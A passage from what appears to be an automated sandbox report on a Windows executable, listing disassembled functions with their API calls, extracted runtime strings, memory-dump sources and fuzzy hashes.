                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                    • String ID:
                                                    • API String ID: 2718003287-0
                                                    • Opcode ID: f3307fa9b22cd1c245fea77c51432e5876b76cda8032067fabe2ab74fde9908f
                                                    • Instruction ID: f5116993726ccefbdaff86af03f817a587ed6b232122ef8f495c24fd00cf2da9
                                                    • Opcode Fuzzy Hash: f3307fa9b22cd1c245fea77c51432e5876b76cda8032067fabe2ab74fde9908f
                                                    • Instruction Fuzzy Hash: BCD1EF72B08A9299E711CF69D8402EC3BB9FB4479CB184239DE5DE7B99DE78D406C340
                                                    Function 00007FF652EE6044 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                    • String ID:
                                                    • API String ID: 2780335769-0
                                                    • Opcode ID: 96091dbd27bcc0a8deeeb26956a1675b21701702191f3790d8b7488761ccdccb
                                                    • Instruction ID: ecd5f9050075c7e9eaf7bfb47e2cdff5a967b214d5427e8405fb9b83ce7b03d8
                                                    • Opcode Fuzzy Hash: 96091dbd27bcc0a8deeeb26956a1675b21701702191f3790d8b7488761ccdccb
                                                    • Instruction Fuzzy Hash: 06518022E086628AF714DFB0DC503BD33B1AB49B9CF189539DE0DA768ADFB8D5458350
                                                    Function 00007FF652ED2310 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$DialogInvalidateRect
                                                    • String ID:
                                                    • API String ID: 1956198572-0
                                                    • Opcode ID: c8ffd58409c2a817e2eafc26a907e7367a815fa90807bfabd45e1aee5e5800ec
                                                    • Instruction ID: 74cdf1ea60d4995b67125f4fa29445a35be23e980b965b7ed723d3fb7ed3a19f
                                                    • Opcode Fuzzy Hash: c8ffd58409c2a817e2eafc26a907e7367a815fa90807bfabd45e1aee5e5800ec
                                                    • Instruction Fuzzy Hash: 7E11E521E1816343FB549B6AFD442BE6291EFC8BC8F5C903CDA49A6B9ACDACD4C54204
                                                    Function 00007FF652EF6A6C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                    • String ID: ?
                                                    • API String ID: 1286766494-1684325040
                                                    • Opcode ID: 8b6f824ce68226522039b5681d667a4258c25c0b371a8f4ef00d3752ae492e10
                                                    • Instruction ID: 2ab370ddfa47d20a98c9ac7a1e0cef6ec6bafab2b3a5dda09fd35152a610116e
                                                    • Opcode Fuzzy Hash: 8b6f824ce68226522039b5681d667a4258c25c0b371a8f4ef00d3752ae492e10
                                                    • Instruction Fuzzy Hash: 15410812A086A247FB249B25BC1137B6650EB827ACF18423DEE6C96AD9DFBCD441C700
                                                    Function 00007FF652EE9DC8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF652EE9DFA
                                                      • Part of subcall function 00007FF652EEB700: RtlFreeHeap.NTDLL(?,?,?,00007FF652EF3B72,?,?,?,00007FF652EF3BAF,?,?,00000000,00007FF652EF4075,?,?,00000000,00007FF652EF3FA7), ref: 00007FF652EEB716
                                                      • Part of subcall function 00007FF652EEB700: GetLastError.KERNEL32(?,?,?,00007FF652EF3B72,?,?,?,00007FF652EF3BAF,?,?,00000000,00007FF652EF4075,?,?,00000000,00007FF652EF3FA7), ref: 00007FF652EEB720
                                                    • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF652EDC335), ref: 00007FF652EE9E18
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                    • String ID: C:\Users\user\Desktop\t8F7Ic986c.exe
                                                    • API String ID: 3580290477-3003899231
                                                    • Opcode ID: 2dc50b8d6a573f30b306f0085b97da4955317f93722b68647fdb996873f18b46
                                                    • Instruction ID: 64352d19ce97752c780942a226aaad31a3f937b9cf17a4fc018a3f355c22a972
                                                    • Opcode Fuzzy Hash: 2dc50b8d6a573f30b306f0085b97da4955317f93722b68647fdb996873f18b46
                                                    • Instruction Fuzzy Hash: A6417136A0872785EB14DF26EC810BD67D5EF44798F58403AEA4D97B95DE7CE4818340
                                                    Function 00007FF652EED9E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: U
                                                    • API String ID: 442123175-4171548499
                                                    • Opcode ID: 76bc1a38fdffd9ebe3e6e71a83b0ba687688a06d9a48e83c019cb8b3d6fff0c8
                                                    • Instruction ID: 777543e6991193062dbc83b6c203fab9c2175dd6d2efac1ff6bebb1e9c87d345
                                                    • Opcode Fuzzy Hash: 76bc1a38fdffd9ebe3e6e71a83b0ba687688a06d9a48e83c019cb8b3d6fff0c8
                                                    • Instruction Fuzzy Hash: D941BF62A18A5285DB20CF25E8443AA67A4FB887D8F884139EE4DD7798EF7CD541C740
                                                    Function 00007FF652EF0108 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID: :
                                                    • API String ID: 1611563598-336475711
                                                    • Opcode ID: 5f6034cdb323e25da13304688bcfaa40664c8172194540dca50913ba3db948d1
                                                    • Instruction ID: 179683cb281d8b8bff8e4d553ac4241f4bd9f646f799853221b66c7f511c7ce1
                                                    • Opcode Fuzzy Hash: 5f6034cdb323e25da13304688bcfaa40664c8172194540dca50913ba3db948d1
                                                    • Instruction Fuzzy Hash: 4521B962B086A181EB219B15E84436E73B1FB84B4CF59803DDA8DA36C8DFFCD545C751
                                                    Function 00007FF652ED2C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Message$ByteCharMultiWide
                                                    • String ID: Error detected
                                                    • API String ID: 1878133881-3513342764
                                                    • Opcode ID: 339977713d7da472da6bf6cde3ee098e7c711e0ac5788cc03ff0aed866900f2e
                                                    • Instruction ID: 5d5b6128a7dd2c619d21f1f5707dc3d3615cc64128ce55d8e3e9c8a06ee4ea01
                                                    • Opcode Fuzzy Hash: 339977713d7da472da6bf6cde3ee098e7c711e0ac5788cc03ff0aed866900f2e
                                                    • Instruction Fuzzy Hash: C621867262869191E720DB10F8516EA6364FF9478CF84513EE68DA7AA9DF7CD205CB00
                                                    Function 00007FF652ED2B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Message$ByteCharMultiWide
                                                    • String ID: Fatal error detected
                                                    • API String ID: 1878133881-4025702859
                                                    • Opcode ID: cc7983d7ddd1ca4fe6b0e820e7fb498cdab092a0274b8afa64f738c4e3f04b3b
                                                    • Instruction ID: 814ec250662e7c91a53cd344ab3b186ae3c8439b1e7765615fa465170facd65a
                                                    • Opcode Fuzzy Hash: cc7983d7ddd1ca4fe6b0e820e7fb498cdab092a0274b8afa64f738c4e3f04b3b
                                                    • Instruction Fuzzy Hash: 7A21867262869291E720DB10F8516EA7364FF9478CF84513DE78DA7AA9DF7CD205CB00
                                                    Function 00007FF652EE0678 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    • Opcode ID: fd7208e01f832ae2c3cc6aa9bb96c2aefef2cc6e58d8a602234d9daac72df826
                                                    • Instruction ID: 405119002a2ef972a8f7b7a1cdb25bdf9193d42f415beb0a38b65a09660848be
                                                    • Opcode Fuzzy Hash: fd7208e01f832ae2c3cc6aa9bb96c2aefef2cc6e58d8a602234d9daac72df826
                                                    • Instruction Fuzzy Hash: 9B115E72618B5282EB218B15F80026A77E1FB88B88F2C4234DE8D67B54EF7CC551CB00
                                                    Function 00007FF652EF1594 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: DriveType_invalid_parameter_noinfo
                                                    • String ID: :
                                                    • API String ID: 2595371189-336475711
                                                    • Opcode ID: b3a001ff98c302286219bbad5be65c90682500455353c0d2fccc423422cbb122
                                                    • Instruction ID: 08f63d992bc44068ddc9943548dff0b76b72082e255055db8ac6a131b1257061
                                                    • Opcode Fuzzy Hash: b3a001ff98c302286219bbad5be65c90682500455353c0d2fccc423422cbb122
                                                    • Instruction Fuzzy Hash: C001F76291C26782F7209F60AC612BF23A0EF4474CF88143DD54EEA285DFBCE504CB10

                                                    Non-executed Functions

                                                    Function 00007FFE148B8B88 Relevance: 51.1, APIs: 3, Strings: 26, Instructions: 340COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $bool$char$char16_t$char32_t$char8_t$const$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
                                                    • API String ID: 2943138195-1201493255
                                                    • Opcode ID: ba71ce222652628ab94be2da16fed93a967c5c253a51ebe34a38362a411097a6
                                                    • Instruction ID: 4cd7ba0bc5c014984d862047d1e8517e4d64e191cf849ae736479d09dad0a6e7
                                                    • Opcode Fuzzy Hash: ba71ce222652628ab94be2da16fed93a967c5c253a51ebe34a38362a411097a6
                                                    • Instruction Fuzzy Hash: F1F15F72E28E128CFB549B6AD8D46BC2761BB16364F8445B5EE0D12BB8DF7CA54CC340
                                                    Function 00007FFE148BC2E8 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 288COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: `anonymous namespace'
                                                    • API String ID: 2943138195-3062148218
                                                    • Opcode ID: 5fe046c2c0b0ac1a9431a4a6ad2eddeb21456c4bdb11c4bf915a68bb353c5420
                                                    • Instruction ID: ffd8333df16a03b69b7eedeaaa4ff7615fdc3236f65e63731d91f463c89a4466
                                                    • Opcode Fuzzy Hash: 5fe046c2c0b0ac1a9431a4a6ad2eddeb21456c4bdb11c4bf915a68bb353c5420
                                                    • Instruction Fuzzy Hash: D7E14972A08B8699EB20DF2AD4C01ED77A0FB46764F84507AFA4D17B65DF38D558C700
                                                    Function 00007FFE148BA768 Relevance: 22.9, APIs: 15, Instructions: 358COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID:
                                                    • API String ID: 2943138195-0
                                                    • Opcode ID: 630320a7c88aac3bb1f6780eccba744e6480051749fed4f0ac5d1929cad96905
                                                    • Instruction ID: 55791db34c3c112e76345492973b494102e30ff162b87c05c5b64da568e42ffd
                                                    • Opcode Fuzzy Hash: 630320a7c88aac3bb1f6780eccba744e6480051749fed4f0ac5d1929cad96905
                                                    • Instruction Fuzzy Hash: 10F19A72A08A829EEB11DF66D4D01FC77B0FB0675CB8440B6EA4D67BA9DE38D549C340
                                                    Function 00007FFE148BD12C Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 339COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-
                                                    • API String ID: 2943138195-4167119577
                                                    • Opcode ID: e672168810272ec3f8c53cb02b46992dc1eb1020882c73149c6b4a83ecb901ec
                                                    • Instruction ID: a7fbae8241a59edafb65df7d898c2bb1a7b2f0c8d7e8742852a16d3f5d2ebd24
                                                    • Opcode Fuzzy Hash: e672168810272ec3f8c53cb02b46992dc1eb1020882c73149c6b4a83ecb901ec
                                                    • Instruction Fuzzy Hash: B8E14F22E18E12ACFB149F6A85D41BC27E0BF47764F4441B5EE0D26BB5DE3CA50E8352
                                                    Function 00007FFE148B2CE4 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 309COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Frame$BlockEstablisherHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 3436797354-393685449
                                                    • Opcode ID: 302f505374dfebb9ff877d34a72b5e8058d71b6ffa9dca6ce2f6e1cbb3f854fd
                                                    • Instruction ID: 75111e898898c2a30a74bb66bff30ae7831edc3350f72ce13361b23ec6824e43
                                                    • Opcode Fuzzy Hash: 302f505374dfebb9ff877d34a72b5e8058d71b6ffa9dca6ce2f6e1cbb3f854fd
                                                    • Instruction Fuzzy Hash: 91D17032A08F418AEB209F66D4852AD77A4FB46BA8F000175FE8D57B65CF38E599C700
                                                    Function 00007FFE148BE248 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 196COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                    • API String ID: 0-3207858774
                                                    • Opcode ID: cf6e9e457acd1e733123883bc6a2677c9cdbf9a15ae0e817e0b089c0cac65ab1
                                                    • Instruction ID: 4c7a342bf8713f3c68bf863b47fe497a0c80489921ec3c48ce0b82d089fef555
                                                    • Opcode Fuzzy Hash: cf6e9e457acd1e733123883bc6a2677c9cdbf9a15ae0e817e0b089c0cac65ab1
                                                    • Instruction Fuzzy Hash: 83915B32A08E868DEB218B26D4D06F877A1BB56B64F8841B5EA4D037B5DF3CE549C350
                                                    Function 00007FFE148BA068 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+$Name::operator+=
                                                    • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                    • API String ID: 179159573-1464470183
                                                    • Opcode ID: ed4f9a6973f612c64292364027933c822cc21b27ce90f41621b4a1da807cec37
                                                    • Instruction ID: d7c1599bb4d23fe98ea1cdfef7f239943fa50e59e56e276484f69caa511c22af
                                                    • Opcode Fuzzy Hash: ed4f9a6973f612c64292364027933c822cc21b27ce90f41621b4a1da807cec37
                                                    • Instruction Fuzzy Hash: 7A513A32F18E1689FB10DB66E8C05BC77B0BB06368F944179FA0E12BA4DF29E549C700
                                                    Function 00007FFE148B8848 Relevance: 15.2, APIs: 10, Instructions: 150COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
